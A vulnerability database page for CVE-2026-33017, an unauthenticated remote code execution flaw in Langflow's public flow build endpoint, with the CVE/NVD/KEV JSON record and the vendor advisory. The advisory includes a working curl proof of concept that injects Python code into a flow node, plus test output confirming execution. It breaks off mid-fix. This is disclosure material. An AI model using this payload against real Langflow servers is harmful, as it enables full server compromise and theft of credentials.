Vulnerability-Lookup

CVE-2026-33017 (GCVE-0-2026-33017)

Vulnerability from cvelistv5 – Published: 2026-03-20 04:52 – Updated: 2026-03-26 03:55

CISA KEV

Title

Langflow has Unauthenticated Remote Code Execution via Public Flow Build Endpoint

Summary

Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the POST /api/v1/build_public_tmp/{flow_id}/flow endpoint allows building public flows without requiring authentication. When the optional data parameter is supplied, the endpoint uses attacker-controlled flow data (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to exec() with zero sandboxing, resulting in unauthenticated remote code execution. This is distinct from CVE-2025-3248, which fixed /api/v1/validate/code by adding authentication. The build_public_tmp endpoint is designed to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code. This issue has been fixed in version 1.9.0.

Severity ?

9.3 (Critical)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L

CWE

CWE-94 - Improper Control of Generation of Code ('Code Injection')
CWE-95 - Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
CWE-306 - Missing Authentication for Critical Function

Assigner

GitHub_M

References

URL

	Vendor	Product	Version
	langflow-ai	langflow	Affected: < 1.9.0

CISA KEV

Known Exploited Vulnerability - GCVE BCP-07 Compliant

KEV entry ID: 2fa65a53-4e12-4dfe-9c4e-6ae6df7c1897

Vulnerability ID: CVE-2026-33017

Status: Confirmed

Status Updated: 2026-03-25 00:00 UTC

Exploited: Yes

Timestamps

First Seen: 2026-03-25

Asserted: 2026-03-25

Scope

Notes: KEV entry: Langflow Code Injection Vulnerability | Affected: Langflow / Langflow | Description: Langflow contains a code injection vulnerability that could allow building public flows without requiring authentication. | Required action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable. | Due date: 2026-04-08 | Known ransomware campaign use (KEV): Unknown | Notes (KEV): https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx ; https://nvd.nist.gov/vuln/detail/CVE-2026-33017

Evidence

Type: Vendor Report

Signal: Successful Exploitation

Confidence: 80%

Source: cisa-kev

Details

Cwes	CWE-94 CWE-95 CWE-306
Feed	CISA Known Exploited Vulnerabilities Catalog
Product	Langflow
Due Date	2026-04-08
Date Added	2026-03-25
Vendorproject	Langflow
Vulnerabilityname	Langflow Code Injection Vulnerability
Knownransomwarecampaignuse	Unknown

References

CVE-2026-33017

Created: 2026-03-25 18:00 UTC | Updated: 2026-03-25 18:00 UTC

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33017",
                "options": [
                  {
                    "Exploitation": "active"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-19T00:00:00+00:00",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          },
          {
            "other": {
              "content": {
                "dateAdded": "2026-03-25",
                "reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017"
              },
              "type": "kev"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-26T03:55:24.750Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "third-party-advisory"
            ],
            "url": "https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours"
          },
          {
            "tags": [
              "exploit"
            ],
            "url": "https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896"
          },
          {
            "tags": [
              "government-resource"
            ],
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-33017"
          },
          {
            "tags": [
              "patch"
            ],
            "url": "https://github.com/langflow-ai/langflow/releases/tag/1.8.2"
          },
          {
            "name": "CISA KEV",
            "tags": [
              "government-resource"
            ],
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017"
          }
        ],
        "timeline": [
          {
            "lang": "en",
            "time": "2026-03-25T00:00:00.000Z",
            "value": "CVE-2026-33017 added to CISA KEV"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "langflow",
          "vendor": "langflow-ai",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.9.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the POST /api/v1/build_public_tmp/{flow_id}/flow endpoint allows building public flows without requiring authentication. When the optional data parameter is supplied, the endpoint uses attacker-controlled flow data (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to exec() with zero sandboxing, resulting in unauthenticated remote code execution. This is distinct from CVE-2025-3248, which fixed /api/v1/validate/code by adding authentication. The build_public_tmp endpoint is designed to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code. This issue has been fixed in version 1.9.0."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 9.3,
            "baseSeverity": "CRITICAL",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "LOW",
            "subConfidentialityImpact": "LOW",
            "subIntegrityImpact": "LOW",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-94",
              "description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-95",
              "description": "CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (\u0027Eval Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-306",
              "description": "CWE-306: Missing Authentication for Critical Function",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-20T04:52:52.885Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx"
        },
        {
          "name": "https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0"
        },
        {
          "name": "https://github.com/advisories/GHSA-rvqx-wpfh-mfx7",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/advisories/GHSA-rvqx-wpfh-mfx7"
        }
      ],
      "source": {
        "advisory": "GHSA-vwmf-pq79-vjvx",
        "discovery": "UNKNOWN"
      },
      "title": "Langflow has Unauthenticated Remote Code Execution via Public Flow Build Endpoint"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33017",
    "datePublished": "2026-03-20T04:52:52.885Z",
    "dateReserved": "2026-03-17T17:22:14.666Z",
    "dateUpdated": "2026-03-26T03:55:24.750Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "cisa_known_exploited": {
      "cveID": "CVE-2026-33017",
      "cwes": "[\"CWE-94\", \"CWE-95\", \"CWE-306\"]",
      "dateAdded": "2026-03-25",
      "dueDate": "2026-04-08",
      "knownRansomwareCampaignUse": "Unknown",
      "notes": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx ; https://nvd.nist.gov/vuln/detail/CVE-2026-33017",
      "product": "Langflow",
      "requiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.",
      "shortDescription": "Langflow contains a code injection vulnerability that could allow building public flows without requiring authentication.",
      "vendorProject": "Langflow",
      "vulnerabilityName": "Langflow Code Injection Vulnerability"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33017\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-20T05:16:15.550\",\"lastModified\":\"2026-03-26T13:26:16.393\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the POST /api/v1/build_public_tmp/{flow_id}/flow endpoint allows building public flows without requiring authentication. When the optional data parameter is supplied, the endpoint uses attacker-controlled flow data (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to exec() with zero sandboxing, resulting in unauthenticated remote code execution. This is distinct from CVE-2025-3248, which fixed /api/v1/validate/code by adding authentication. The build_public_tmp endpoint is designed to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code. This issue has been fixed in version 1.9.0.\"},{\"lang\":\"es\",\"value\":\"Langflow es una herramienta para construir y desplegar agentes y flujos de trabajo impulsados por IA. En versiones anteriores a la 1.9.0, el endpoint POST /api/v1/build_public_tmp/{flow_id}/flow permite construir flujos p\u00fablicos sin requerir autenticaci\u00f3n. Cuando se suministra el par\u00e1metro opcional data, el endpoint utiliza datos de flujo controlados por el atacante (que contienen c\u00f3digo Python arbitrario en las definiciones de nodos) en lugar de los datos de flujo almacenados en la base de datos. Este c\u00f3digo se pasa a exec() sin ning\u00fan sandboxing, lo que resulta en una ejecuci\u00f3n remota de c\u00f3digo no autenticada. Esto es distinto de CVE-2025-3248, que corrigi\u00f3 /api/v1/validate/code a\u00f1adiendo autenticaci\u00f3n. El endpoint build_public_tmp est\u00e1 dise\u00f1ado para no requerir autenticaci\u00f3n (para flujos p\u00fablicos) pero acepta incorrectamente datos de flujo suministrados por el atacante que contienen c\u00f3digo ejecutable arbitrario. Este problema ha sido solucionado en la versi\u00f3n 1.9.0.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":9.3,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"LOW\",\"subIntegrityImpact\":\"LOW\",\"subAvailabilityImpact\":\"LOW\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"cisaExploitAdd\":\"2026-03-25\",\"cisaActionDue\":\"2026-04-08\",\"cisaRequiredAction\":\"Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\",\"cisaVulnerabilityName\":\"Langflow Code Injection Vulnerability\",\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-94\"},{\"lang\":\"en\",\"value\":\"CWE-95\"},{\"lang\":\"en\",\"value\":\"CWE-306\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.8.2\",\"matchCriteriaId\":\"B38E7511-B77D-4E5F-B33A-458EE5770358\"}]}]}],\"references\":[{\"url\":\"https://github.com/advisories/GHSA-rvqx-wpfh-mfx7\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/langflow-ai/langflow/releases/tag/1.8.2\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-33017\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"US Government Resource\"]},{\"url\":\"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"US Government Resource\"]},{\"url\":\"https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Press/Media Coverage\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33017\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"active\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-25T16:45:41.195522Z\"}}}, {\"other\": {\"type\": \"kev\", \"content\": {\"dateAdded\": \"2026-03-25\", \"reference\": \"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017\"}}}], \"references\": [{\"url\": \"https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours\", \"tags\": [\"third-party-advisory\"]}, {\"url\": \"https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896\", \"tags\": [\"exploit\"]}, {\"url\": \"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-33017\", \"tags\": [\"government-resource\"]}, {\"url\": \"https://github.com/langflow-ai/langflow/releases/tag/1.8.2\", \"tags\": [\"patch\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-20T17:10:40.185Z\"}, \"timeline\": [{\"lang\": \"en\", \"time\": \"2026-03-25T00:00:00.000Z\", \"value\": \"CVE-2026-33017 added to CISA KEV\"}]}], \"cna\": {\"title\": \"Langflow has Unauthenticated Remote Code Execution via Public Flow Build Endpoint\", \"source\": {\"advisory\": \"GHSA-vwmf-pq79-vjvx\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 9.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"LOW\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"LOW\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"LOW\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"langflow-ai\", \"product\": \"langflow\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.9.0\"}]}], \"references\": [{\"url\": \"https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx\", \"name\": \"https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0\", \"name\": \"https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/advisories/GHSA-rvqx-wpfh-mfx7\", \"name\": \"https://github.com/advisories/GHSA-rvqx-wpfh-mfx7\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the POST /api/v1/build_public_tmp/{flow_id}/flow endpoint allows building public flows without requiring authentication. When the optional data parameter is supplied, the endpoint uses attacker-controlled flow data (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to exec() with zero sandboxing, resulting in unauthenticated remote code execution. This is distinct from CVE-2025-3248, which fixed /api/v1/validate/code by adding authentication. The build_public_tmp endpoint is designed to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code. This issue has been fixed in version 1.9.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-94\", \"description\": \"CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-95\", \"description\": \"CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (\u0027Eval Injection\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-306\", \"description\": \"CWE-306: Missing Authentication for Critical Function\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-20T04:52:52.885Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33017\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-26T03:55:24.750Z\", \"dateReserved\": \"2026-03-17T17:22:14.666Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-20T04:52:52.885Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-VWMF-PQ79-VJVX

Vulnerability from github – Published: 2026-03-17 20:05 – Updated: 2026-03-26 15:41

Summary

Unauthenticated Remote Code Execution in Langflow via Public Flow Build Endpoint

Details

Summary

The POST /api/v1/build_public_tmp/{flow_id}/flow endpoint allows building public flows without requiring authentication. When the optional data parameter is supplied, the endpoint uses attacker-controlled flow data (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to exec() with zero sandboxing, resulting in unauthenticated remote code execution.

This is distinct from CVE-2025-3248, which fixed /api/v1/validate/code by adding authentication. The build_public_tmp endpoint is designed to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code.

Affected Code

Vulnerable Endpoint (No Authentication)

File: src/backend/base/langflow/api/v1/chat.py, lines 580-657

@router.post("/build_public_tmp/{flow_id}/flow")
async def build_public_tmp(
    *,
    flow_id: uuid.UUID,
    data: Annotated[FlowDataRequest | None, Body(embed=True)] = None,  # ATTACKER CONTROLLED
    request: Request,
    # ... NO Depends(get_current_active_user) -- MISSING AUTH ...
):
    """Build a public flow without requiring authentication."""
    client_id = request.cookies.get("client_id")
    owner_user, new_flow_id = await verify_public_flow_and_get_user(flow_id=flow_id, client_id=client_id)

    job_id = await start_flow_build(
        flow_id=new_flow_id,
        data=data,  # Attacker's data passed directly to graph builder
        current_user=owner_user,
        ...
    )

Compare with the authenticated build endpoint at line 138, which requires current_user: CurrentActiveUser.

Code Execution Chain

When attacker-supplied data is provided, it flows through:

start_flow_build(data=attacker_data) → generate_flow_events() -- build.py:81
create_graph() → build_graph_from_data(payload=data.model_dump()) -- build.py:298
Graph.from_payload(payload) parses attacker nodes -- base.py:1168
add_nodes_and_edges() → initialize() → _build_graph() -- base.py:270,527
_instantiate_components_in_vertices() iterates nodes -- base.py:1323
vertex.instantiate_component() → instantiate_class(vertex) -- loading.py:28
code = custom_params.pop("code") extracts attacker code -- loading.py:43
eval_custom_component_code(code) → create_class(code, class_name) -- eval.py:9
prepare_global_scope(module) -- validate.py:323
exec(compiled_code, exec_globals) -- ARBITRARY CODE EXECUTION -- validate.py:397

Unsandboxed exec() in prepare_global_scope

File: src/lfx/src/lfx/custom/validate.py, lines 340-397

def prepare_global_scope(module):
    exec_globals = globals().copy()

    # Imports are resolved first (any module can be imported)
    for node in imports:
        module_obj = importlib.import_module(module_name)  # line 352
        exec_globals[variable_name] = module_obj

    # Then ALL top-level definitions are executed (Assign, ClassDef, FunctionDef)
    if definitions:
        combined_module = ast.Module(body=definitions, type_ignores=[])
        compiled_code = compile(combined_module, "<string>", "exec")
        exec(compiled_code, exec_globals)  # line 397 - ARBITRARY CODE EXECUTION

Critical detail: prepare_global_scope executes ast.Assign nodes. An attacker's code like _x = os.system("id") is an assignment and will be executed during graph building -- before the flow even "runs."

Prerequisites

Target Langflow instance has at least one public flow (common for demos, chatbots, shared workflows)
Attacker knows the public flow's UUID (discoverable via shared links/URLs)
No authentication required -- only a client_id cookie (any arbitrary string value)

When AUTO_LOGIN=true (the default), all prerequisites can be met by an unauthenticated attacker: 1. GET /api/v1/auto_login → obtain superuser token 2. POST /api/v1/flows/ → create a public flow 3. Exploit via build_public_tmp without any auth

Proof of Concept

Tested Against

Langflow version 1.7.3 (latest stable release, installed via pip install langflow)
Fully reproducible: 6/6 runs confirmed RCE (two sets of 3 runs each)

Step 1: Obtain a Public Flow ID

(In a real attack, the attacker discovers this via shared links. For the PoC, we create one via AUTO_LOGIN.)

# Get superuser token (no credentials needed when AUTO_LOGIN=true)
TOKEN=$(curl -s http://localhost:7860/api/v1/auto_login | jq -r '.access_token')

# Create a public flow
FLOW_ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"name":"test","data":{"nodes":[],"edges":[]},"access_type":"PUBLIC"}' \
  | jq -r '.id')

echo "Public Flow ID: $FLOW_ID"

Step 2: Exploit -- Unauthenticated RCE

# EXPLOIT: Send malicious flow data to the UNAUTHENTICATED endpoint
# NO Authorization header, NO API key, NO credentials
curl -X POST "http://localhost:7860/api/v1/build_public_tmp/${FLOW_ID}/flow" \
  -H "Content-Type: application/json" \
  -b "client_id=attacker" \
  -d '{
    "data": {
      "nodes": [{
        "id": "Exploit-001",
        "type": "genericNode",
        "position": {"x":0,"y":0},
        "data": {
          "id": "Exploit-001",
          "type": "ExploitComp",
          "node": {
            "template": {
              "code": {
                "type": "code",
                "required": true,
                "show": true,
                "multiline": true,
                "value": "import os, socket, json as _json\n\n_proof = os.popen(\"id\").read().strip()\n_host = socket.gethostname()\n_write = open(\"/tmp/rce-proof\",\"w\").write(f\"{_proof} on {_host}\")\n\nfrom lfx.custom.custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n    display_name=\"X\"\n    outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n    def r(self)->Data:\n        return Data(data={})",
                "name": "code",
                "password": false,
                "advanced": false,
                "dynamic": false
              },
              "_type": "Component"
            },
            "description": "X",
            "base_classes": ["Data"],
            "display_name": "ExploitComp",
            "name": "ExploitComp",
            "frozen": false,
            "outputs": [{"types":["Data"],"selected":"Data","name":"o","display_name":"O","method":"r","value":"__UNDEFINED__","cache":true,"allows_loop":false,"tool_mode":false,"hidden":null,"required_inputs":null,"group_outputs":false}],
            "field_order": ["code"],
            "beta": false,
            "edited": false
          }
        }
      }],
      "edges": []
    },
    "inputs": null
  }'

Step 3: Verify Code Execution

# Wait 2 seconds for async graph building
sleep 2

# Check proof file written by attacker's code on the server
cat /tmp/rce-proof
# Output: uid=1000(aviral) gid=1000(aviral) groups=... on kali

Actual Test Results

======================================================================
LANGFLOW v1.7.3 UNAUTHENTICATED RCE - DEFINITIVE E2E TEST
======================================================================
Version:  Langflow 1.7.3

RUN 1: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)
  HTTP 200 - Job ID: d8db19bf-a532-4f9d-a368-9c46d6235c19
  *** REMOTE CODE EXECUTION CONFIRMED ***
    canary: RCE-f0d19b36
    hostname: kali
    uid: 1000
    whoami: aviral
    id: uid=1000(aviral) gid=1000(aviral) groups=1000(aviral),...
    uname: Linux 6.16.8+kali-amd64

RUN 2: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)
  HTTP 200 - Job ID: d2e24f20-d707-4278-868c-583dd7532832
  *** REMOTE CODE EXECUTION CONFIRMED ***
    canary: RCE-6037a271

RUN 3: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)
  HTTP 200 - Job ID: 5962244a-42af-4ef6-b134-a6a4adba5ab7
  *** REMOTE CODE EXECUTION CONFIRMED ***
    canary: RCE-4a796556

FINAL RESULTS
  Total checks:   15
  VULNERABLE:     15
  SAFE:           0
  RCE confirmed:  3/3 runs
  Reproducible:   YES (100%)

Impact

Unauthenticated Remote Code Execution with full server process privileges
Complete server compromise: arbitrary file read/write, command execution
Environment variable exfiltration: API keys, database credentials, cloud tokens (confirmed in PoC: env_keys exfiltrated)
Reverse shell access for persistent access
Lateral movement within the network
Data exfiltration from all flows, messages, and stored credentials in the database

Comparison with CVE-2025-3248

Aspect	CVE-2025-3248	This Vulnerability
Endpoint	`/api/v1/validate/code`	`/api/v1/build_public_tmp/{id}/flow`
Fix applied	Added `Depends(get_current_active_user)`	None -- NEW vulnerability
Root cause	Missing auth on code validation	Unauthenticated endpoint accepts attacker-controlled executable code via `data` param
Code execution via	`validate_code()` → `exec()`	`create_class()` → `prepare_global_scope()` → `exec()`
CISA KEV	Yes (actively exploited)	N/A (new finding)
Can simple auth fix?	Yes (and it was fixed)	No -- endpoint is designed to be unauthenticated; the `data` parameter must be removed

Recommended Fix

Immediate (Short-term)

Remove the data parameter from build_public_tmp. Public flows should only execute their stored flow data, never attacker-supplied data:

@router.post("/build_public_tmp/{flow_id}/flow")
async def build_public_tmp(
    *,
    flow_id: uuid.UUID,
    inputs: Annotated[InputValueRequest | None, Body(embed=True)] = None,
    # REMOVED: data parameter -- public flows must use stored data only
    ...
):

In generate_flow_events → create_graph(), only the build_graph_from_db path should be reachable for unauthenticated requests:

async def create_graph(fresh_session, flow_id_str, flow_name):
